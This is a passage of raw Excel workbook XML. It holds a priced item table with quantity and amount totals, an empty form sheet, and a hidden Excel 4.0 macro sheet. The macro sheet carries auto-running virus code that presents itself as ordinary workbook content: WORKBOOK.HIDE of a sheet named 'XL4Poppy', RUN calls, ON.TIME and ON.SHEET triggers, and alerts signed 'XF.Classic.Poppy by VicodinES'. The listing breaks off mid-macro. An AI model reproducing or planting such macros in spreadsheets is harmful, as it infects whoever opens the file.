      <x:c r="I5" s="32"/>
      <x:c r="J5" s="34">
        <x:v>2000</x:v>
      </x:c>
      <x:c r="K5" s="35"/>
    </x:row>
    <x:row r="6" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B6" s="30">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C6" s="37" t="s">
        <x:v>14</x:v>
      </x:c>
      <x:c r="D6" s="36">
        <x:v>20000</x:v>
      </x:c>
      <x:c r="E6" s="32" t="s">
        <x:v>29</x:v>
      </x:c>
      <x:c r="F6" s="32">
        <x:v>1</x:v>
      </x:c>
      <x:c r="G6" s="32"/>
      <x:c r="H6" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I6" s="32"/>
      <x:c r="J6" s="34">
        <x:v>60000</x:v>
      </x:c>
      <x:c r="K6" s="35"/>
    </x:row>
    <x:row r="7" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B7" s="30">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C7" s="37" t="s">
        <x:v>18</x:v>
      </x:c>
      <x:c r="D7" s="36">
        <x:v>10000</x:v>
      </x:c>
      <x:c r="E7" s="32" t="s">
        <x:v>46</x:v>
      </x:c>
      <x:c r="F7" s="32">
        <x:v>1</x:v>
      </x:c>
      <x:c r="G7" s="32"/>
      <x:c r="H7" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I7" s="32"/>
      <x:c r="J7" s="34">
        <x:v>10000</x:v>
      </x:c>
      <x:c r="K7" s="35"/>
    </x:row>
    <x:row r="8" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B8" s="30">
        <x:v>4</x:v>
      </x:c>
      <x:c r="C8" s="37" t="s">
        <x:v>41</x:v>
      </x:c>
      <x:c r="D8" s="36">
        <x:v>5000</x:v>
      </x:c>
      <x:c r="E8" s="32" t="s">
        <x:v>33</x:v>
      </x:c>
      <x:c r="F8" s="32">
        <x:v>1</x:v>
      </x:c>
      <x:c r="G8" s="32"/>
      <x:c r="H8" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I8" s="32"/>
      <x:c r="J8" s="34">
        <x:v>10000</x:v>
      </x:c>
      <x:c r="K8" s="35"/>
    </x:row>
    <x:row r="9" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B9" s="30">
        <x:v>5</x:v>
      </x:c>
      <x:c r="C9" s="37" t="s">
        <x:v>5</x:v>
      </x:c>
      <x:c r="D9" s="36">
        <x:v>5000</x:v>
      </x:c>
      <x:c r="E9" s="32" t="s">
        <x:v>33</x:v>
      </x:c>
      <x:c r="F9" s="32">
        <x:v>1</x:v>
      </x:c>
      <x:c r="G9" s="32"/>
      <x:c r="H9" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I9" s="32"/>
      <x:c r="J9" s="34">
        <x:v>10000</x:v>
      </x:c>
      <x:c r="K9" s="35"/>
    </x:row>
    <x:row r="10" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B10" s="30">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C10" s="37" t="s">
        <x:v>28</x:v>
      </x:c>
      <x:c r="D10" s="36">
        <x:v>4000</x:v>
      </x:c>
      <x:c r="E10" s="32" t="s">
        <x:v>33</x:v>
      </x:c>
      <x:c r="F10" s="27">
        <x:v>2</x:v>
      </x:c>
      <x:c r="G10" s="27"/>
      <x:c r="H10" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I10" s="27"/>
      <x:c r="J10" s="33">
        <x:v>20000</x:v>
      </x:c>
      <x:c r="K10" s="28"/>
    </x:row>
    <x:row r="11" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B11" s="30">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C11" s="37" t="s">
        <x:v>17</x:v>
      </x:c>
      <x:c r="D11" s="36">
        <x:v>1000</x:v>
      </x:c>
      <x:c r="E11" s="27" t="s">
        <x:v>29</x:v>
      </x:c>
      <x:c r="F11" s="27">
        <x:v>2</x:v>
      </x:c>
      <x:c r="G11" s="27"/>
      <x:c r="H11" s="29" t="s">
        <x:v>37</x:v>
      </x:c>
      <x:c r="I11" s="27"/>
      <x:c r="J11" s="33">
        <x:v>2000</x:v>
      </x:c>
      <x:c r="K11" s="28"/>
    </x:row>
    <x:row r="12" spans="2:11" s="16" customFormat="1" ht="20" customHeight="1">
      <x:c r="B12" s="30" t="s">
        <x:v>39</x:v>
      </x:c>
      <x:c r="C12" s="31"/>
      <x:c r="D12" s="32"/>
      <x:c r="E12" s="32"/>
      <x:c r="F12" s="32">
        <x:f>F5+F6+F7+F8+F9+F10+F11</x:f>
        <x:v>9</x:v>
      </x:c>
      <x:c r="G12" s="32"/>
      <x:c r="H12" s="29"/>
      <x:c r="I12" s="32"/>
      <x:c r="J12" s="34">
        <x:f>SUM(J5:J11)</x:f>
        <x:v>114000</x:v>
      </x:c>
      <x:c r="K12" s="35"/>
    </x:row>
    <x:row r="13" spans="2:10" ht="24.75" customHeight="1">
      <x:c r="B13" s="38" t="s">
        <x:v>7</x:v>
      </x:c>
      <x:c r="C13" s="38"/>
      <x:c r="D13" s="38"/>
      <x:c r="E13" s="38"/>
      <x:c r="F13" s="38"/>
      <x:c r="G13" s="38"/>
      <x:c r="H13" s="38"/>
      <x:c r="I13" s="38"/>
      <x:c r="J13" s="38"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells count="10">
    <x:mergeCell ref="B13:J13"/>
    <x:mergeCell ref="E3:E4"/>
    <x:mergeCell ref="F3:F4"/>
    <x:mergeCell ref="G3:I3"/>
    <x:mergeCell ref="J3:J4"/>
    <x:mergeCell ref="B3:B4"/>
    <x:mergeCell ref="C3:C4"/>
    <x:mergeCell ref="D3:D4"/>
    <x:mergeCell ref="B2:K2"/>
    <x:mergeCell ref="K3:K4"/>
  </x:mergeCells>
  <x:pageMargins left="0.19666667282581329" right="0.19666667282581329" top="0.98416668176651001" bottom="0.98416668176651001" header="0.51138889789581299" footer="0.51138889789581299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2:I47"/>
  <x:sheetViews>
    <x:sheetView topLeftCell="A1" zoomScaleNormal="100" workbookViewId="0">
      <x:selection activeCell="C5" activeCellId="0" sqref="C5:I5"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultRowHeight="12.199999999999999"/>
  <x:cols>
    <x:col min="1" max="1" width="5.33203125" style="14" customWidth="1"/>
    <x:col min="2" max="8" width="9.33203125" style="14" customWidth="1"/>
    <x:col min="9" max="9" width="38.66796875" style="14" customWidth="1"/>
    <x:col min="10" max="16384" width="9.33203125" style="14" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" ht="15.75" customHeight="1"/>
    <x:row r="2" spans="1:9" ht="50.100000000000001" customHeight="1">
      <x:c r="A2" s="22"/>
      <x:c r="B2" s="62" t="s">
        <x:v>47</x:v>
      </x:c>
      <x:c r="C2" s="62"/>
      <x:c r="D2" s="62"/>
      <x:c r="E2" s="62"/>
      <x:c r="F2" s="62"/>
      <x:c r="G2" s="62"/>
      <x:c r="H2" s="62"/>
      <x:c r="I2" s="62"/>
    </x:row>
    <x:row r="3" spans="1:9" ht="30" customHeight="1">
      <x:c r="A3" s="23"/>
      <x:c r="B3" s="20"/>
      <x:c r="C3" s="20"/>
      <x:c r="D3" s="20"/>
      <x:c r="E3" s="20"/>
      <x:c r="F3" s="20"/>
      <x:c r="G3" s="20"/>
      <x:c r="H3" s="20"/>
      <x:c r="I3" s="24"/>
    </x:row>
    <x:row r="4" spans="1:9" ht="30" customHeight="1">
      <x:c r="A4" s="23"/>
      <x:c r="B4" s="54"/>
      <x:c r="C4" s="54"/>
      <x:c r="D4" s="54"/>
      <x:c r="E4" s="54"/>
      <x:c r="F4" s="54"/>
      <x:c r="G4" s="54"/>
      <x:c r="H4" s="54"/>
      <x:c r="I4" s="55"/>
    </x:row>
    <x:row r="5" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A5" s="63" t="s">
        <x:v>11</x:v>
      </x:c>
      <x:c r="B5" s="64"/>
      <x:c r="C5" s="49"/>
      <x:c r="D5" s="50"/>
      <x:c r="E5" s="50"/>
      <x:c r="F5" s="50"/>
      <x:c r="G5" s="50"/>
      <x:c r="H5" s="50"/>
      <x:c r="I5" s="51"/>
    </x:row>
    <x:row r="6" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A6" s="63" t="s">
        <x:v>12</x:v>
      </x:c>
      <x:c r="B6" s="64"/>
      <x:c r="C6" s="49"/>
      <x:c r="D6" s="49"/>
      <x:c r="E6" s="49"/>
      <x:c r="F6" s="49"/>
      <x:c r="G6" s="49"/>
      <x:c r="H6" s="49"/>
      <x:c r="I6" s="53"/>
    </x:row>
    <x:row r="7" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A7" s="63" t="s">
        <x:v>15</x:v>
      </x:c>
      <x:c r="B7" s="64"/>
      <x:c r="C7" s="52"/>
      <x:c r="D7" s="49"/>
      <x:c r="E7" s="49"/>
      <x:c r="F7" s="49"/>
      <x:c r="G7" s="49"/>
      <x:c r="H7" s="49"/>
      <x:c r="I7" s="53"/>
    </x:row>
    <x:row r="8" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A8" s="63" t="s">
        <x:v>10</x:v>
      </x:c>
      <x:c r="B8" s="64"/>
      <x:c r="C8" s="52"/>
      <x:c r="D8" s="49"/>
      <x:c r="E8" s="49"/>
      <x:c r="F8" s="49"/>
      <x:c r="G8" s="49"/>
      <x:c r="H8" s="49"/>
      <x:c r="I8" s="53"/>
    </x:row>
    <x:row r="9" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A9" s="25"/>
      <x:c r="B9" s="21"/>
      <x:c r="C9" s="21"/>
      <x:c r="D9" s="21"/>
      <x:c r="E9" s="21"/>
      <x:c r="F9" s="21"/>
      <x:c r="G9" s="21"/>
      <x:c r="H9" s="21"/>
      <x:c r="I9" s="26"/>
    </x:row>
    <x:row r="10" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A10" s="25"/>
      <x:c r="B10" s="21"/>
      <x:c r="C10" s="21"/>
      <x:c r="D10" s="21"/>
      <x:c r="E10" s="21"/>
      <x:c r="F10" s="21"/>
      <x:c r="G10" s="21"/>
      <x:c r="H10" s="21"/>
      <x:c r="I10" s="26"/>
    </x:row>
    <x:row r="11" spans="1:9" s="18" customFormat="1" ht="39.950000000000003" customHeight="1">
      <x:c r="A11" s="59" t="s">
        <x:v>24</x:v>
      </x:c>
      <x:c r="B11" s="60"/>
      <x:c r="C11" s="60"/>
      <x:c r="D11" s="60"/>
      <x:c r="E11" s="60"/>
      <x:c r="F11" s="60"/>
      <x:c r="G11" s="60"/>
      <x:c r="H11" s="60"/>
      <x:c r="I11" s="61"/>
    </x:row>
    <x:row r="12" spans="1:9" ht="30" customHeight="1">
      <x:c r="A12" s="23"/>
      <x:c r="B12" s="20"/>
      <x:c r="C12" s="20"/>
      <x:c r="D12" s="20"/>
      <x:c r="E12" s="20"/>
      <x:c r="F12" s="20"/>
      <x:c r="G12" s="20"/>
      <x:c r="H12" s="20"/>
      <x:c r="I12" s="24"/>
    </x:row>
    <x:row r="13" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A13" s="47" t="s">
        <x:v>42</x:v>
      </x:c>
      <x:c r="B13" s="48"/>
      <x:c r="C13" s="48"/>
      <x:c r="D13" s="49"/>
      <x:c r="E13" s="50"/>
      <x:c r="F13" s="50"/>
      <x:c r="G13" s="50"/>
      <x:c r="H13" s="50"/>
      <x:c r="I13" s="51"/>
    </x:row>
    <x:row r="14" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A14" s="47" t="s">
        <x:v>44</x:v>
      </x:c>
      <x:c r="B14" s="48"/>
      <x:c r="C14" s="48"/>
      <x:c r="D14" s="49"/>
      <x:c r="E14" s="50"/>
      <x:c r="F14" s="50"/>
      <x:c r="G14" s="50"/>
      <x:c r="H14" s="50"/>
      <x:c r="I14" s="51"/>
    </x:row>
    <x:row r="15" spans="1:9" s="18" customFormat="1" ht="30" customHeight="1">
      <x:c r="A15" s="47" t="s">
        <x:v>25</x:v>
      </x:c>
      <x:c r="B15" s="48"/>
      <x:c r="C15" s="48"/>
      <x:c r="D15" s="49"/>
      <x:c r="E15" s="50"/>
      <x:c r="F15" s="50"/>
      <x:c r="G15" s="50"/>
      <x:c r="H15" s="50"/>
      <x:c r="I15" s="51"/>
    </x:row>
    <x:row r="16" spans="1:9" ht="30" customHeight="1">
      <x:c r="A16" s="44"/>
      <x:c r="B16" s="45"/>
      <x:c r="C16" s="45"/>
      <x:c r="D16" s="45"/>
      <x:c r="E16" s="45"/>
      <x:c r="F16" s="45"/>
      <x:c r="G16" s="45"/>
      <x:c r="H16" s="45"/>
      <x:c r="I16" s="46"/>
    </x:row>
    <x:row r="17" spans="1:9" ht="30" customHeight="1">
      <x:c r="A17" s="44"/>
      <x:c r="B17" s="45"/>
      <x:c r="C17" s="45"/>
      <x:c r="D17" s="45"/>
      <x:c r="E17" s="45"/>
      <x:c r="F17" s="45"/>
      <x:c r="G17" s="45"/>
      <x:c r="H17" s="45"/>
      <x:c r="I17" s="46"/>
    </x:row>
    <x:row r="18" spans="1:9" ht="30" customHeight="1">
      <x:c r="A18" s="44"/>
      <x:c r="B18" s="45"/>
      <x:c r="C18" s="45"/>
      <x:c r="D18" s="45"/>
      <x:c r="E18" s="45"/>
      <x:c r="F18" s="45"/>
      <x:c r="G18" s="45"/>
      <x:c r="H18" s="45"/>
      <x:c r="I18" s="46"/>
    </x:row>
    <x:row r="19" spans="1:9" ht="60" customHeight="1">
      <x:c r="A19" s="56" t="s">
        <x:v>45</x:v>
      </x:c>
      <x:c r="B19" s="57"/>
      <x:c r="C19" s="57"/>
      <x:c r="D19" s="57"/>
      <x:c r="E19" s="57"/>
      <x:c r="F19" s="57"/>
      <x:c r="G19" s="57"/>
      <x:c r="H19" s="57"/>
      <x:c r="I19" s="58"/>
    </x:row>
    <x:row r="20" spans="2:9" ht="24.949999999999999" customHeight="1">
      <x:c r="B20" s="19"/>
      <x:c r="C20" s="19"/>
      <x:c r="D20" s="19"/>
      <x:c r="E20" s="19"/>
      <x:c r="F20" s="19"/>
      <x:c r="G20" s="19"/>
      <x:c r="H20" s="19"/>
      <x:c r="I20" s="19"/>
    </x:row>
    <x:row r="21" spans="2:9" ht="24.949999999999999" customHeight="1">
      <x:c r="B21" s="19"/>
      <x:c r="C21" s="19"/>
      <x:c r="D21" s="19"/>
      <x:c r="E21" s="19"/>
      <x:c r="F21" s="19"/>
      <x:c r="G21" s="19"/>
      <x:c r="H21" s="19"/>
      <x:c r="I21" s="19"/>
    </x:row>
    <x:row r="22" spans="2:9" ht="12" customHeight="1">
      <x:c r="B22" s="19"/>
      <x:c r="C22" s="19"/>
      <x:c r="D22" s="19"/>
      <x:c r="E22" s="19"/>
      <x:c r="F22" s="19"/>
      <x:c r="G22" s="19"/>
      <x:c r="H22" s="19"/>
      <x:c r="I22" s="19"/>
    </x:row>
    <x:row r="23" spans="2:9" ht="12" customHeight="1">
      <x:c r="B23" s="19"/>
      <x:c r="C23" s="19"/>
      <x:c r="D23" s="19"/>
      <x:c r="E23" s="19"/>
      <x:c r="F23" s="19"/>
      <x:c r="G23" s="19"/>
      <x:c r="H23" s="19"/>
      <x:c r="I23" s="19"/>
    </x:row>
    <x:row r="24" spans="2:9" ht="12" customHeight="1">
      <x:c r="B24" s="19"/>
      <x:c r="C24" s="19"/>
      <x:c r="D24" s="19"/>
      <x:c r="E24" s="19"/>
      <x:c r="F24" s="19"/>
      <x:c r="G24" s="19"/>
      <x:c r="H24" s="19"/>
      <x:c r="I24" s="19"/>
    </x:row>
    <x:row r="25" spans="2:9" ht="12" customHeight="1">
      <x:c r="B25" s="19"/>
      <x:c r="C25" s="19"/>
      <x:c r="D25" s="19"/>
      <x:c r="E25" s="19"/>
      <x:c r="F25" s="19"/>
      <x:c r="G25" s="19"/>
      <x:c r="H25" s="19"/>
      <x:c r="I25" s="19"/>
    </x:row>
    <x:row r="26" spans="2:9" ht="12" customHeight="1">
      <x:c r="B26" s="19"/>
      <x:c r="C26" s="19"/>
      <x:c r="D26" s="19"/>
      <x:c r="E26" s="19"/>
      <x:c r="F26" s="19"/>
      <x:c r="G26" s="19"/>
      <x:c r="H26" s="19"/>
      <x:c r="I26" s="19"/>
    </x:row>
    <x:row r="27" spans="2:9" ht="12" customHeight="1">
      <x:c r="B27" s="19"/>
      <x:c r="C27" s="19"/>
      <x:c r="D27" s="19"/>
      <x:c r="E27" s="19"/>
      <x:c r="F27" s="19"/>
      <x:c r="G27" s="19"/>
      <x:c r="H27" s="19"/>
      <x:c r="I27" s="19"/>
    </x:row>
    <x:row r="28" spans="2:9" ht="12" customHeight="1">
      <x:c r="B28" s="19"/>
      <x:c r="C28" s="19"/>
      <x:c r="D28" s="19"/>
      <x:c r="E28" s="19"/>
      <x:c r="F28" s="19"/>
      <x:c r="G28" s="19"/>
      <x:c r="H28" s="19"/>
      <x:c r="I28" s="19"/>
    </x:row>
    <x:row r="29" spans="2:9" ht="12" customHeight="1">
      <x:c r="B29" s="19"/>
      <x:c r="C29" s="19"/>
      <x:c r="D29" s="19"/>
      <x:c r="E29" s="19"/>
      <x:c r="F29" s="19"/>
      <x:c r="G29" s="19"/>
      <x:c r="H29" s="19"/>
      <x:c r="I29" s="19"/>
    </x:row>
    <x:row r="30" spans="2:9" ht="12" customHeight="1">
      <x:c r="B30" s="19"/>
      <x:c r="C30" s="19"/>
      <x:c r="D30" s="19"/>
      <x:c r="E30" s="19"/>
      <x:c r="F30" s="19"/>
      <x:c r="G30" s="19"/>
      <x:c r="H30" s="19"/>
      <x:c r="I30" s="19"/>
    </x:row>
    <x:row r="31" spans="2:9" ht="12" customHeight="1">
      <x:c r="B31" s="19"/>
      <x:c r="C31" s="19"/>
      <x:c r="D31" s="19"/>
      <x:c r="E31" s="19"/>
      <x:c r="F31" s="19"/>
      <x:c r="G31" s="19"/>
      <x:c r="H31" s="19"/>
      <x:c r="I31" s="19"/>
    </x:row>
    <x:row r="32" spans="2:9" ht="12" customHeight="1">
      <x:c r="B32" s="19"/>
      <x:c r="C32" s="19"/>
      <x:c r="D32" s="19"/>
      <x:c r="E32" s="19"/>
      <x:c r="F32" s="19"/>
      <x:c r="G32" s="19"/>
      <x:c r="H32" s="19"/>
      <x:c r="I32" s="19"/>
    </x:row>
    <x:row r="33" spans="2:9" ht="12" customHeight="1">
      <x:c r="B33" s="19"/>
      <x:c r="C33" s="19"/>
      <x:c r="D33" s="19"/>
      <x:c r="E33" s="19"/>
      <x:c r="F33" s="19"/>
      <x:c r="G33" s="19"/>
      <x:c r="H33" s="19"/>
      <x:c r="I33" s="19"/>
    </x:row>
    <x:row r="34" spans="2:9" ht="12" customHeight="1">
      <x:c r="B34" s="19"/>
      <x:c r="C34" s="19"/>
      <x:c r="D34" s="19"/>
      <x:c r="E34" s="19"/>
      <x:c r="F34" s="19"/>
      <x:c r="G34" s="19"/>
      <x:c r="H34" s="19"/>
      <x:c r="I34" s="19"/>
    </x:row>
    <x:row r="35" spans="2:9" ht="12" customHeight="1">
      <x:c r="B35" s="19"/>
      <x:c r="C35" s="19"/>
      <x:c r="D35" s="19"/>
      <x:c r="E35" s="19"/>
      <x:c r="F35" s="19"/>
      <x:c r="G35" s="19"/>
      <x:c r="H35" s="19"/>
      <x:c r="I35" s="19"/>
    </x:row>
    <x:row r="36" spans="2:9" ht="12" customHeight="1">
      <x:c r="B36" s="19"/>
      <x:c r="C36" s="19"/>
      <x:c r="D36" s="19"/>
      <x:c r="E36" s="19"/>
      <x:c r="F36" s="19"/>
      <x:c r="G36" s="19"/>
      <x:c r="H36" s="19"/>
      <x:c r="I36" s="19"/>
    </x:row>
    <x:row r="37" spans="2:9" ht="12" customHeight="1">
      <x:c r="B37" s="19"/>
      <x:c r="C37" s="19"/>
      <x:c r="D37" s="19"/>
      <x:c r="E37" s="19"/>
      <x:c r="F37" s="19"/>
      <x:c r="G37" s="19"/>
      <x:c r="H37" s="19"/>
      <x:c r="I37" s="19"/>
    </x:row>
    <x:row r="38" spans="2:9" ht="12" customHeight="1">
      <x:c r="B38" s="19"/>
      <x:c r="C38" s="19"/>
      <x:c r="D38" s="19"/>
      <x:c r="E38" s="19"/>
      <x:c r="F38" s="19"/>
      <x:c r="G38" s="19"/>
      <x:c r="H38" s="19"/>
      <x:c r="I38" s="19"/>
    </x:row>
    <x:row r="39" spans="2:9" ht="12" customHeight="1">
      <x:c r="B39" s="19"/>
      <x:c r="C39" s="19"/>
      <x:c r="D39" s="19"/>
      <x:c r="E39" s="19"/>
      <x:c r="F39" s="19"/>
      <x:c r="G39" s="19"/>
      <x:c r="H39" s="19"/>
      <x:c r="I39" s="19"/>
    </x:row>
    <x:row r="40" spans="2:9" ht="12" customHeight="1">
      <x:c r="B40" s="19"/>
      <x:c r="C40" s="19"/>
      <x:c r="D40" s="19"/>
      <x:c r="E40" s="19"/>
      <x:c r="F40" s="19"/>
      <x:c r="G40" s="19"/>
      <x:c r="H40" s="19"/>
      <x:c r="I40" s="19"/>
    </x:row>
    <x:row r="41" spans="2:9" ht="12" customHeight="1">
      <x:c r="B41" s="19"/>
      <x:c r="C41" s="19"/>
      <x:c r="D41" s="19"/>
      <x:c r="E41" s="19"/>
      <x:c r="F41" s="19"/>
      <x:c r="G41" s="19"/>
      <x:c r="H41" s="19"/>
      <x:c r="I41" s="19"/>
    </x:row>
    <x:row r="42" spans="2:9" ht="12" customHeight="1">
      <x:c r="B42" s="19"/>
      <x:c r="C42" s="19"/>
      <x:c r="D42" s="19"/>
      <x:c r="E42" s="19"/>
      <x:c r="F42" s="19"/>
      <x:c r="G42" s="19"/>
      <x:c r="H42" s="19"/>
      <x:c r="I42" s="19"/>
    </x:row>
    <x:row r="43" spans="2:9" ht="12" customHeight="1">
      <x:c r="B43" s="19"/>
      <x:c r="C43" s="19"/>
      <x:c r="D43" s="19"/>
      <x:c r="E43" s="19"/>
      <x:c r="F43" s="19"/>
      <x:c r="G43" s="19"/>
      <x:c r="H43" s="19"/>
      <x:c r="I43" s="19"/>
    </x:row>
    <x:row r="44" spans="2:9" ht="12" customHeight="1">
      <x:c r="B44" s="19"/>
      <x:c r="C44" s="19"/>
      <x:c r="D44" s="19"/>
      <x:c r="E44" s="19"/>
      <x:c r="F44" s="19"/>
      <x:c r="G44" s="19"/>
      <x:c r="H44" s="19"/>
      <x:c r="I44" s="19"/>
    </x:row>
    <x:row r="45" spans="2:9" ht="12" customHeight="1">
      <x:c r="B45" s="19"/>
      <x:c r="C45" s="19"/>
      <x:c r="D45" s="19"/>
      <x:c r="E45" s="19"/>
      <x:c r="F45" s="19"/>
      <x:c r="G45" s="19"/>
      <x:c r="H45" s="19"/>
      <x:c r="I45" s="19"/>
    </x:row>
    <x:row r="46" spans="2:9" ht="12" customHeight="1">
      <x:c r="B46" s="19"/>
      <x:c r="C46" s="19"/>
      <x:c r="D46" s="19"/>
      <x:c r="E46" s="19"/>
      <x:c r="F46" s="19"/>
      <x:c r="G46" s="19"/>
      <x:c r="H46" s="19"/>
      <x:c r="I46" s="19"/>
    </x:row>
    <x:row r="47" spans="2:9" ht="12" customHeight="1">
      <x:c r="B47" s="19"/>
      <x:c r="C47" s="19"/>
      <x:c r="D47" s="19"/>
      <x:c r="E47" s="19"/>
      <x:c r="F47" s="19"/>
      <x:c r="G47" s="19"/>
      <x:c r="H47" s="19"/>
      <x:c r="I47" s="19"/>
    </x:row>
  </x:sheetData>
  <x:mergeCells count="21">
    <x:mergeCell ref="A19:I19"/>
    <x:mergeCell ref="A17:I17"/>
    <x:mergeCell ref="A5:B5"/>
    <x:mergeCell ref="A6:B6"/>
    <x:mergeCell ref="A7:B7"/>
    <x:mergeCell ref="A8:B8"/>
    <x:mergeCell ref="A11:I11"/>
    <x:mergeCell ref="A15:C15"/>
    <x:mergeCell ref="A16:I16"/>
    <x:mergeCell ref="A18:I18"/>
    <x:mergeCell ref="D13:I13"/>
    <x:mergeCell ref="D14:I14"/>
    <x:mergeCell ref="D15:I15"/>
    <x:mergeCell ref="A14:C14"/>
    <x:mergeCell ref="A13:C13"/>
    <x:mergeCell ref="C7:I7"/>
    <x:mergeCell ref="C8:I8"/>
    <x:mergeCell ref="B2:I2"/>
    <x:mergeCell ref="B4:I4"/>
    <x:mergeCell ref="C5:I5"/>
    <x:mergeCell ref="C6:I6"/>
  </x:mergeCells>
  <x:pageMargins left="0.74805557727813721" right="0.74805557727813721" top="0.98430556058883667" bottom="0.98430556058883667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C41"/>
  <x:sheetViews>
    <x:sheetView topLeftCell="A1" zoomScaleNormal="100" workbookViewId="0">
      <x:selection activeCell="C1" activeCellId="0" sqref="C1:C1"/>
    </x:sheetView>
  </x:sheetViews>
  <x:sheetFormatPr defaultRowHeight="12.9"/>
  <x:cols>
    <x:col min="1" max="1" width="34.83203125" style="2" customWidth="1"/>
    <x:col min="2" max="2" width="1.5" style="2" customWidth="1"/>
    <x:col min="3" max="3" width="37.5" style="2" customWidth="1"/>
    <x:col min="4" max="16384" width="10.6640625" style="2" customWidth="1"/>
  </x:cols>
  <x:sheetData>
    <x:row r="1" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A1" s="1" t="s">
        <x:v>9</x:v>
      </x:c>
      <x:c r="C1" s="2" t="e">
        <x:f>WORKBOOK.HIDE("XL4Poppy")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="2" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A2" s="1" t="s">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="3" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A3" s="3" t="s">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C3" s="4" t="s">
        <x:v>21</x:v>
      </x:c>
    </x:row>
    <x:row r="4" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A4" s="3" t="e">
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C4" s="5" t="e">
        <x:f>RUN(C18)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="5" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C5" s="5" t="e">
        <x:f>ERROR(TRUE,)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="6" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C6" s="5" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="7" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A7" s="6" t="s">
        <x:v>6</x:v>
      </x:c>
      <x:c r="C7" s="5" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="8" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A8" s="7" t="s">
        <x:v>26</x:v>
      </x:c>
      <x:c r="C8" s="5" t="e">
        <x:f>END.IF()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="9" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A9" s="8" t="s">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C9" s="5" t="e">
        <x:f>ERROR(FALSE)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="10" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A10" s="7" t="s">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C10" s="5" t="e">
        <x:f>RUN(A21)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="11" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A11" s="9" t="s">
        <x:v>23</x:v>
      </x:c>
      <x:c r="C11" s="5" t="e">
        <x:f>ON.TIME("6:30:00 PM","Hello")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="12" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C12" s="5" t="e">
        <x:f>ON.TIME("6:30:00 AM","Morning")</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="13" spans="3:3" ht="13.5" customHeight="1">
      <x:c r="C13" s="5" t="e">
        <x:f>ON.SHEET(,"Poppy",TRUE)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="14" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A14" s="4" t="s">
        <x:v>20</x:v>
      </x:c>
      <x:c r="C14" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="15" spans="1:1" ht="12.75" customHeight="1">
      <x:c r="A15" s="5" t="e">
        <x:f>ALERT("XF.Classic.Poppy by VicodinES",2)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="16" spans="1:1" ht="13.5" customHeight="1">
      <x:c r="A16" s="5" t="e">
        <x:f>ALERT("ⓒ 1998 The Narkotic Network",2)</x:f>
        <x:v>#NAME?</x:v>
      </x:c>
    </x:row>
    <x:row r="17" spans="1:3" ht="13.5" customHeight="1">
      <x:c r="A17" s="10" t="e">
        <x:f>RETURN()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C17" s="4" t="s">
        <x:v>22</x:v>
      </x:c>
    </x:row>
    <x:row r="18" spans="3:3" ht="12.75" customHeight="1">
      <x:c r="C18" s="5" t="e">
